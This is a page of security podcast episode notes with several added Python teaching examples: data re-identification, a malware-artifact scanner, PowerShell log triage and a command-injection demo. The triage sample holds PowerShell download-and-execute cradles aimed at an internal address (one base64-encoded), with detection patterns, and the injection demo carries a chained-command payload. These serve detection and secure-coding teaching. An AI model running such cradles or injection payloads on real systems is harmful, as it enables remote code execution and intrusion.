Checkbox security... checklists that compliance people require, which many security people have to fall in line with because they often have no choice.
But what if there was a way to use compliance requirements to get beyond the baseline of PCI/SOC 2/HIPAA and actually become more secure?
Magen Wu (@tottenkoph), Mr. Boettcher, and I spent some time discussing just that. We cover basic issues with compliance frameworks, how to get management to buy in to more security, and even how to get compliance people to help without them knowing it.
After last week's discussion of end-user training in the SANS Top 20 Critical Security Controls, we realized it would be great to discuss how a company that is actually in the training business does training properly.
So we hit up our sponsor, Cybrary.it, to discuss their end-user security training track and how companies can use it to help their employees be more secure in the workplace.
We end the podcast with a bit of audio from the BSides Austin blue/red panel that Mr. Boettcher moderated. He asked the panel about training and its worth. The first answer, from Justin Whitehead, is telling: he believes training will fail regardless. His answer was chilling, in fact, and we hope to continue that conversation with him in the future.
For long-time listeners of the podcast: back when Brian and I first wanted to do the podcast, we were working at the same company, and the first episode we recorded was on hashes.
Bob story: Bob was getting tired of explaining what MD5, SHA-1, and SHA-2 were to developers, so as we were developing our idea for the podcast, this became our first episode. Mr. Boettcher had several ideas for podcasts before this one.
I was actually going to go it alone, but wanted him to join me. Thankfully, he broached the idea of being on the podcast. This was actually the second take; the first one was recorded in our office, and since we didn't want any legal issues from doing it at work, we trashed it and made this version. I thought the first take was better, but what are you gonna do... :)
End-user training. Lots of companies need regular security training. Many treat it as a once-a-year checkbox for compliance requirements. Given the way training is carried out in many organizations, is it any wonder that phishing emails still get clicked, passwords still get compromised, and sensitive information is still leaked?
We discuss methods to make training more effective, and how to make people want to do the training.
Finally, we discuss Capture-The-Flag competitions, and why it would behoove blue team people to attempt them. They are a great barometer for understanding your shortcomings and what you, as a blue teamer, might need to study up on...
Katherine Carpenter is a privacy consultant who has worked all over the world helping to develop guidelines for ethical medical research and the sharing of anonymized data, and helping companies understand the privacy issues associated with storing and sharing medical data.
This week, we discuss how companies should assign value to their data, the difficulties of doing research with anonymized data, and the ramifications of research organizations sharing data irresponsibly.
email contact: email@example.com
Katherine's notes, comments, and links:
It is good to be thinking about de-identification (especially regarding health care data)
I think a better question to ask is how easy it is to re-identify information that has been de-identified. The HIPAA rule has 18 identifiers which count as Personally Identifiable Information (PII) or Personal Health Information (PHI); these include birth date, zip code, and IP address. When data is collected in non-health contexts, these identifiers are not considered PII/PHI (for example, this kind of information can be used for marketing purposes or financial/credit-related purposes).
A brief history on the topic:
In 1997, a precocious grad student IDed the Governor of MA by using purchased voter records to re-ID de-IDed health information that had been released. (This study was one motivator to pass HIPAA.) Further research along the same lines can be summed up with a simple and scary statistic: in 2000, 87% of Americans may be uniquely identified by combining zip code, birthday, and sex (gender).
For this reason, health information is threatened not only by de-ID'n and re-ID'n, but by combining it with other types of information that are publicly available or available for purchase, which could reveal things about an individual and contribute to re-ID of that individual's health info.
Here are a bunch of articles that discuss the topic from different angles.
Dwork, C. and Yekhanin, S. (2008), “New Efficient Attacks on Statistical Disclosure Control Mechanisms,” Advances in Cryptology—CRYPTO 2008, to appear, also at http://research.microsoft.com/research/sv/DatabasePrivacy/dy08.pdf
Is Deidentification Sufficient to Protect Health Privacy in Research?
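The voter-roll linkage attack and the zip/birthday/sex statistic above, worked through in code. This is an added example and is not part of Katherine's note or the episode; every record in it is constructed (the names, ZIP codes, birth dates and diagnoses are made up), and the "generalize" step is one common mitigation, not the only one.

```python
"""Linkage attack on a 'de-identified' health extract, plus a k-anonymity check.

Added example; not from the episode or Katherine's note. Every record below is
constructed: names, ZIP codes, birth dates and diagnoses are all made up.
"""
from collections import Counter, defaultdict

# Quasi-identifiers: not names, but in combination they single people out.
QUASI_IDS = ("zip", "dob", "sex")

# Constructed health extract: names stripped, quasi-identifiers left intact.
HEALTH = [
    {"zip": "02138", "dob": "1945-07-31", "sex": "M", "dx": "hypertension"},
    {"zip": "02139", "dob": "1945-02-10", "sex": "M", "dx": "asthma"},
    {"zip": "02139", "dob": "1982-03-02", "sex": "F", "dx": "diabetes"},
    {"zip": "02140", "dob": "1982-09-20", "sex": "F", "dx": "migraine"},
    {"zip": "02140", "dob": "1990-11-15", "sex": "M", "dx": "fracture"},
    {"zip": "02141", "dob": "1990-01-05", "sex": "M", "dx": "gout"},
]

# Constructed public voter roll: names plus the same quasi-identifiers.
VOTERS = [
    {"name": "Bob Brown",  "zip": "02138", "dob": "1945-07-31", "sex": "M"},
    {"name": "Carl Cole",  "zip": "02139", "dob": "1945-02-10", "sex": "M"},
    {"name": "Dana Diaz",  "zip": "02139", "dob": "1982-03-02", "sex": "F"},
    {"name": "Dora Dunn",  "zip": "02139", "dob": "1982-03-02", "sex": "F"},  # same key as Dana
    {"name": "Erin Ellis", "zip": "02140", "dob": "1982-09-20", "sex": "F"},
    {"name": "Finn Ford",  "zip": "02140", "dob": "1990-11-15", "sex": "M"},
    {"name": "Gus Gray",   "zip": "02141", "dob": "1990-01-05", "sex": "M"},
]


def key(rec, quasi_ids=QUASI_IDS):
    """The tuple an attacker joins on."""
    return tuple(rec[q] for q in quasi_ids)


def k_anonymity(records, quasi_ids=QUASI_IDS):
    """Size of the smallest equivalence class; k == 1 means some row is unique."""
    return min(Counter(key(r, quasi_ids) for r in records).values())


def fraction_unique(records, quasi_ids=QUASI_IDS):
    """Share of rows that are alone in their class (the '87%' style statistic)."""
    counts = Counter(key(r, quasi_ids) for r in records)
    return sum(1 for r in records if counts[key(r, quasi_ids)] == 1) / len(records)


def link(health, voters, quasi_ids=QUASI_IDS):
    """Join the two datasets on the quasi-identifiers.

    Returns {diagnosis: name} for every health row whose key matches exactly one
    voter and exactly one health row; ambiguous joins are left out.
    """
    names_by_key = defaultdict(list)
    for v in voters:
        names_by_key[key(v, quasi_ids)].append(v["name"])
    health_counts = Counter(key(h, quasi_ids) for h in health)
    identified = {}
    for h in health:
        k = key(h, quasi_ids)
        if len(names_by_key.get(k, ())) == 1 and health_counts[k] == 1:
            identified[h["dx"]] = names_by_key[k][0]
    return identified


def generalize(rec):
    """Coarsen the quasi-identifiers: 3-digit ZIP prefix and birth year only."""
    out = dict(rec)
    out["zip"] = rec["zip"][:3]
    out["dob"] = rec["dob"][:4]
    return out


if __name__ == "__main__":
    print("k =", k_anonymity(HEALTH), "unique =", fraction_unique(HEALTH))
    print("re-identified:", link(HEALTH, VOTERS))
    gen_health = [generalize(h) for h in HEALTH]
    gen_voters = [generalize(v) for v in VOTERS]
    print("after generalization: k =", k_anonymity(gen_health))
    print("re-identified:", link(gen_health, gen_voters))
```

On the raw extract every row is unique on (zip, dob, sex), so five of the six diagnoses attach to a name; the only one that survives is the case where two voters share a key. Coarsening ZIP and date of birth brings every class to size 2 and the join returns nothing, which is the property to check before releasing data, rather than whether names were removed.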
In incident response, clear communication is key to managing an incident effectively. This week, we had Mick Douglas, DFIR instructor at SANS, and Jarrod Frates, a pentester at InGuardians with a great deal of experience handling incidents. Find out about some of the roles in an incident response (the Shadow, the event coordinator, the lead tech), and why companies should have an IR plan that handles various incident severities.
Jarrod updates us on TheLab.ms and how you might like to help them!
Finally, we are holding a contest to win a ticket to DerbyCon; full instructions are below. We are giving away two tickets.
DerbyCon 1st Ticket contest expires 31 July 2015.
1. To enter for a ticket to DerbyCon
a. A donation must be made to Hackers for Charity (http://www.hackersforcharity.org/)
b. Once the donation is made, email the receipt for your donation to firstname.lastname@example.org
c. If you win, we will contact you at the email address you mailed the receipt from, with our contact information. You will need to contact us when you get to DerbyCon, as we will not send you the ticket directly. You will also be responsible for airfare and accommodations at DerbyCon.
Strap yourselves in, ladies and gentlemen. With Mr. Boettcher gone on "vacation" this week, I needed some help with the podcast, and boy did we pick a doozy. If you're a fan of Turing-complete algorithms (frankly, who isn't? ;) ), we had Ms. Fabienne Serrière (@fbz) and Ms. Magen Wu (@tottenkoph), who discuss higher-order math and psychology on our podcast this week.
We also discuss a little project management, and even talk about why proper survey sizes and getting a good cross-section are important.
Be sure to pick up one of Ms. Fbz's scarves, especially if you're a math nut and love fractals and patterns as I do.
Elementary Cellular Automaton : http://mathworld.wolfram.com/ElementaryCellularAutomaton.html
Turing Complete: https://en.wikipedia.org/wiki/Turing_completeness
Sierpinski Triangle: https://en.wikipedia.org/wiki/Sierpinski_triangle
Chomsky Hierarchy: https://en.wikipedia.org/wiki/Chomsky_hierarchy
Sergey Bratus: http://www.cs.dartmouth.edu/~sergey/
Stego Hats: http://www.ravelry.com/projects/fbz/pseudo-random-reversible-hat
SeaSec East: http://www.meetup.com/SEASec-East/
My podcast co-host Brian Boettcher, along with Kate Brew, an Austin, TX based security blogger, headed up this panel called "Red Team vs. Blue Team". The idea was to ask people from both sides of the aisle (attackers and defenders) pressing questions about how the industry operates.
Infosec heavyweights like Kevin Johnson (@secureideas), Mano Paul (@manopaul), and Josh Sokol (@joshSokol) made this an excellent podcast...
We hope you enjoy!
Roxy, who we interviewed a few months ago on our podcast about hackerspaces, is back with us this week to discuss a project she is working on called 'Big Brown Cloud'. If you've ever wanted to set up your own fake blog and draw people to it to gain information on possible attacks, you've come to the right place.
We also get an update on the hackerspace that Jarrod, Sean, and Roxy were setting up a few months ago. They've come a long way, and they are about to move into their new facility.
In this podcast, you'll learn about:
Log analytics software that can be used to parse system logs for nasty malware
Detecting malware artifacts
Windows directory locations worth watching
Looking for indicators like packing, changed hashes, etc.
Tips for capturing malware samples using tools like RoboCopy
Learn about what code caves are and how malware hides inside them (http://www.codeproject.com/Articles/20240/The-Beginners-Guide-to-Codecaves)
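The artifact-hunting points in the list above (directory locations, changed hashes, packing), turned into a small scanner. This is an added example, not code from the episode or from Michael Gough; the watched directories and the entropy threshold are assumptions, and the files that demo() plants in a temporary directory are constructed so the scan can run offline.

```python
"""Hunt for malware artifacts on disk: hash drift against a baseline, packing
indicators (high entropy, packer section names), and files that are simply new.

Added example; not from the episode. The watched locations and the entropy
threshold are assumptions, and the files planted by demo() are constructed.
"""
import hashlib
import math
import os
import shutil
import tempfile
from collections import Counter

# Assumed list of locations where dropped malware commonly lands; tune per host.
WATCHED_DIRS = [r"C:\Windows\Temp", r"C:\Users\Public", r"C:\ProgramData"]
ENTROPY_THRESHOLD = 7.2            # bits per byte; packed/encrypted data approaches 8.0
PACKER_MARKERS = (b"UPX0", b"UPX1", b".aspack", b".petite")   # section names left by packers


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty or constant input, 8.0 for uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Snapshot {relative path: sha256} of a known-good tree, before exposure."""
    return {os.path.relpath(os.path.join(d, n), root): sha256_file(os.path.join(d, n))
            for d, _, names in os.walk(root) for n in names}


def inspect_file(path: str, rel: str, baseline: dict) -> list:
    """Indicators for one file; an empty list means nothing looked odd."""
    findings = []
    digest = sha256_file(path)
    if rel not in baseline:
        findings.append("new file (not in baseline)")
    elif baseline[rel] != digest:
        findings.append("hash changed since baseline")
    with open(path, "rb") as f:
        data = f.read()
    if shannon_entropy(data) >= ENTROPY_THRESHOLD:
        findings.append("high entropy (possible packing/encryption)")
    if data[:2] == b"MZ" and any(m in data for m in PACKER_MARKERS):
        findings.append("known packer section name")
    return findings


def scan(root: str, baseline: dict) -> dict:
    """Walk root and return {relative path: [findings]} for every flagged file."""
    report = {}
    for d, _, names in os.walk(root):
        for n in names:
            p = os.path.join(d, n)
            rel = os.path.relpath(p, root)
            hits = inspect_file(p, rel, baseline)
            if hits:
                report[rel] = hits
    return report


def demo() -> dict:
    """Constructed scenario: baseline a directory, then plant a tampered, a
    packed-looking and a brand-new file, and scan it again."""
    tmp = tempfile.mkdtemp()
    try:
        good = os.path.join(tmp, "svc.dll")
        with open(good, "wb") as f:
            f.write(b"MZ" + b"\x90" * 400)              # benign-looking, low entropy
        baseline = build_baseline(tmp)
        with open(good, "ab") as f:
            f.write(b"\xcc")                             # tamper: hash now drifts
        with open(os.path.join(tmp, "upd.exe"), "wb") as f:
            f.write(b"MZ" + b"UPX0" + os.urandom(4096))  # packer marker + high entropy
        with open(os.path.join(tmp, "note.txt"), "wb") as f:
            f.write(b"hello world")                      # merely new
        return scan(tmp, baseline)
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(rel, "->", ", ".join(hits))
    # On a real host: build_baseline(d) at install time, then scan(d, baseline)
    # on a schedule for each d in WATCHED_DIRS.
```

The baseline is the important part: a hash only tells you something if you have a known-good value to compare it with, so take it before the machine is exposed and store it off the host. Entropy is a heuristic (legitimately compressed or signed installers score high too), so treat it as a reason to look closer, not as a verdict.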
Michael Gough joined us again to discuss malware detection techniques on Windows systems. We talk about how you can change PowerShell's default settings to get much better logging. We also find out about some hidden gems that all but guarantee you'll know when you've been infiltrated.
Stay for the PowerShell security education, and you'll also learn some new terminology, like "Malware Archaeology", "Malwarians", and "Log-aholic", to name a few...
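Once PowerShell logging is turned up, the question is what to look for in it. The following is an added example, not the episode's or Michael Gough's material: it triages script block log entries (Event ID 4104) for common attacker tradecraft, decoding -EncodedCommand blobs and rescanning them. The events are constructed to resemble 4104 message text, and the indicator list is an assumed starting set rather than a complete ruleset.

```python
"""Triage PowerShell script block log entries (Event ID 4104) for attacker tradecraft.

Added example; not from the episode. The events are constructed to look like the
message text of 4104 entries, and the indicator list is an assumed starting set.
"""
import base64
import re


def encode_command(ps: str) -> str:
    """Build an -EncodedCommand argument the way powershell.exe expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str):
    """Reverse encode_command(); None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed 4104-style entries. The 4103 (module logging) entry is included only
# to show that the triage skips everything that is not a script block.
ENCODED_PAYLOAD = encode_command(
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.0.0.5/b.ps1')")
SAMPLE_EVENTS = [
    {"id": 4104, "host": "WS01", "script": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"id": 4104, "host": "WS01",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"},
    {"id": 4104, "host": "WS02", "script": "powershell.exe -NoP -W Hidden -Enc " + ENCODED_PAYLOAD},
    {"id": 4103, "host": "WS02", "script": "CommandInvocation(Get-Process)"},
]

INDICATORS = [
    ("inline execution", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
    ("download cradle", re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I)),
    ("hidden window", re.compile(r"-W(indowStyle)?\s+Hidden", re.I)),
    ("execution policy bypass", re.compile(r"-(ep|ExecutionPolicy)\s+Bypass", re.I)),
]
# -e/-ec/-enc/-EncodedCommand followed by a base64 blob; the blob is decoded and rescanned.
ENCODED_ARG = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def analyze_script(script: str) -> list:
    """Indicator names found in one script block, recursing into encoded commands."""
    hits = [name for name, rx in INDICATORS if rx.search(script)]
    m = ENCODED_ARG.search(script)
    if m:
        hits.append("encoded command")
        inner = decode_command(m.group(2))
        if inner:
            hits.extend("decoded: " + h for h in analyze_script(inner))
    return hits


def triage(events) -> list:
    """Return one finding per 4104 event that carries at least one indicator."""
    findings = []
    for ev in events:
        if ev.get("id") != 4104:
            continue
        hits = analyze_script(ev["script"])
        if hits:
            findings.append({"host": ev["host"], "indicators": hits, "script": ev["script"][:80]})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["host"], f["indicators"], f["script"])
```

Script block logging is off by default. It is enabled through the "Turn on PowerShell Script Block Logging" group policy (the EnableScriptBlockLogging value under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging), after which 4104 events land in the Microsoft-Windows-PowerShell/Operational log and can be forwarded to whatever log analytics you run. The decode-and-rescan step matters because the outer command line of an encoded launch often looks harmless on its own.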
This week, we discuss various methods of enabling companies to move applications to cloud-based platforms.
We discuss containers, like Docker, and how various hosting services handle moving businesses from a traditional data center to a secure, cloud-based environment.
We even discuss securing data in the cloud: keeping bad guys out of it, and also keeping it from the cloud provider itself, which can be served with a subpoena to hand over your data.
Brakeing Down Security would like to thank FireHost for allowing Chase and Mike to join us.
With last week's revelation from Microsoft that they will support SSH, understanding PowerShell has become more important than ever as a tool for blue teamers, both for administration and for understanding how bad guys will use it for nefarious deeds on your network.
Part 2 of our interview with Mick Douglas discusses a bit more about the DEV522 class he teaches for SANS, and why it seems that blue team (defenders) are not getting the training they should. When defenders are deficient in necessary skills, the knowledge gap between attackers and defenders widens.
We had the opportunity to discuss with Mick Douglas the stigma that blue team is always on the losing end of security. Is it because there are more tools for pentesters or bad guys, or because it takes a massive IT budget to be secure? We don't believe so... Great insights into how a blue team can protect their network.
Making a network more secure by deploying tools is no easy task. This week, we show you a tool, Security Onion, that can give you an IDS and a log analysis tool in less than 20 minutes.
When you're working with network infrastructure, there's a real need for proper configuration management, as well as having a proper baseline to work from.
Mr. Boettcher and I continue through the SANS Top 20 Critical Security Controls. #10 and #11 both deal with network infrastructure: proper patching and baselines for being as secure as possible. Your company's security posture needs to be a 'brick', not an 'egg'.
We continue our journey through the 24 Deadly Sins of Software Security. If you listened to last week's podcast, we introduced the book we are using as a study tool.
This week is on command injection. We first discussed command injection as part of our OWASP Top 10 for 2013 series, but you'll be surprised just how easily developers create conditions in their code that allow for command injection.
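The pattern that creates those conditions, next to its hardened forms, as an added example that is not from the episode or the book. It uses echo so it runs offline on any POSIX system; the same shape applies wherever ping, nslookup, an image converter or any other program is invoked with user-controlled input. The attacker payloads are constructed.

```python
"""Command injection: the vulnerable pattern next to its hardened forms.

Added example; not from the episode or the book. It uses `echo` so it runs
offline on any POSIX system; the same shape applies wherever a program such as
ping, nslookup or an image converter is invoked with user-controlled input.
"""
import re
import shlex
import subprocess

# Allow-list for a hostname-ish value: letters, digits, dots and dashes only.
HOSTNAME = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def run_unsafe(user_input: str) -> str:
    """VULNERABLE: user input concatenated into a shell command line, so
    ; | & $( ) and backticks are interpreted by /bin/sh."""
    cmd = "echo " + user_input
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.rstrip("\n")


def run_safe(user_input: str) -> str:
    """HARDENED: no shell at all; the argv list hands the value over as one literal argument."""
    out = subprocess.run(["echo", user_input], capture_output=True, text=True)
    return out.stdout.rstrip("\n")


def validate_hostname(user_input: str) -> bool:
    """Defence in depth: allow-list the value before any command sees it."""
    return HOSTNAME.match(user_input) is not None


def run_validated(user_input: str) -> str:
    if not validate_hostname(user_input):
        raise ValueError("rejected: not a hostname")
    return run_safe(user_input)


def quoted_command(user_input: str) -> str:
    """If a shell is unavoidable, shlex.quote() neutralises metacharacters."""
    return "echo " + shlex.quote(user_input)


def run_quoted(user_input: str) -> str:
    out = subprocess.run(quoted_command(user_input), shell=True, capture_output=True, text=True)
    return out.stdout.rstrip("\n")


if __name__ == "__main__":
    payload = "example.org; echo INJECTED"       # constructed attacker input
    print("unsafe :", repr(run_unsafe(payload)))   # the second command actually runs
    print("safe   :", repr(run_safe(payload)))     # payload echoed back verbatim
    print("quoted :", repr(run_quoted(payload)))
    print("valid? :", validate_hostname(payload), validate_hostname("example.org"))
```

The order of preference is: do not spawn a shell at all (argv list), validate against an allow-list of what the value is supposed to be, and only if a shell is truly required, quote with shlex.quote(). Blacklisting individual characters such as ';' is the approach that keeps failing, because $(...), backticks, newlines and pipe all have to be caught too.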
At DerbyCon last year, Mr. Boettcher did a microcast with Johnny Long, an inspirational human being who left a life many infosec professionals dream of and went to Africa to help disadvantaged people build a better life through access to technology.
Where is the audio, you ask? Well, we've posted it on our Patreon so that our patrons get first dibs on it. We'll post it here this weekend for everyone.
He is a great individual and we hope you'll enjoy it.
Code audits are a necessary evil. Many organizations resort to using automated tools, but tools may not find every issue with the code. Sometimes you need to look at the code yourself.
Mr. Boettcher and I begin going through the book "24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them". What we covered this week is "buffer overruns": we discuss what they are and how they occur.
Get ready for a crash course in code audits. The book is not required, but it definitely helps when we are discussing concepts.
We also mentioned our new Patreon account, so if you are a listener, and want to support what we do, you can give on a per month schedule. Donations are entirely optional, and if you don't wish to give, that's fine too.
24 Deadly Sins on Amazon:
When you're faced with major projects, or working to understand why your IDS fails every day at the same time, there must be a way to work that out. And when you must do the yearly business continuity failover, you need a process-oriented framework to track changes and ensure they are committed in a sane, orderly manner.
ITIL is a versatile, flexible framework that scales with your organization. You can also use it with your software development lifecycle, and you can use it to enhance major projects and security initiatives.
Tim Wood joins us for the second part of his interview. We discuss Change Management, Problem Management and making inter-departmental SLAs a reality for proper management of changes.
Tim Wood's Presentation: https://drive.google.com/file/d/0B-qfQ-gWynwiVS0zLTZidml0VzA/view?usp=sharing (view only)
Much of infosec and compliance is about processes, procedures, controls, audits, and the proper management of all of these. To do so, you need a proper framework to make these as seamless as possible. ITIL is one such framework.
We introduce Mr. Tim Wood on the podcast, who has over 20 years of ITIL experience and began with ITIL implementations in banks and healthcare systems in the United Kingdom. He currently works with different industries to change culture and make ITIL a reality.
This week, we go over the history of ITIL and its various incarnations from v1.0 to v3.0. You'll quickly see where security starts fitting into all the facets of the ITIL framework.
Tim Wood's Presentation: https://drive.google.com/file/d/0B-qfQ-gWynwiVS0zLTZidml0VzA/view?usp=sharing (view only)
Special interview this week! On the heels of their hugely successful Kickstarter campaign, we brought co-founder Ryan and one of the technical editors, Anthony, in to discuss what Cybrary is. We also discuss ways you can leverage it in your own business to get quality security awareness training, as well as to train up your employees on infosec topics that can benefit your company and employees. You can find out more at http://www.cybrary.it
It's that time of year again... when all the reports come out that show how various industries did over the last year.
Brakeing Down Security went over the results of the Verizon PCI report. Did companies do worse this year, or did they actually improve? Listen to our analysis of what companies can learn from this, and how you can use this report to get a leg up when your QSA comes calling.
Pay IRS using "Snapcard": http://www.coindesk.com/pay-taxes-bitcoin-snapcard-pay-irs/
According to the US Internal Revenue Service (IRS), virtual currencies are treated as "Property": http://www.irs.gov/uac/Newsroom/IRS-Virtual-Currency-Guidance
We continue our trek down the list of SANS Top 20 Critical Security Controls this week with #12 and #13: Boundary Defense, and Controlled Use of Administrative Privileges. Learn what you can do to shore up your network defenses, and how to handle admin privileges: when to give that kind of access, and how to make privileged access as secure as possible while still allowing administrators to do their work.
We invited the organizers of TheLab.ms, a Dallas, Texas based hacker/makerspace, onto the podcast to talk about why they wanted to start a makerspace, the costs and plans involved in setting one up, and some of the things you can do with a makerspace. We also get a sense of the community and the learning environment these places provide.
If you are looking to start a space in your area, or looking to understand why they are needed in a community, you'll want to listen to Roxy, Sean, and Jarrod talk about the highs and lows, and even some of the gotchas, of setting up a space.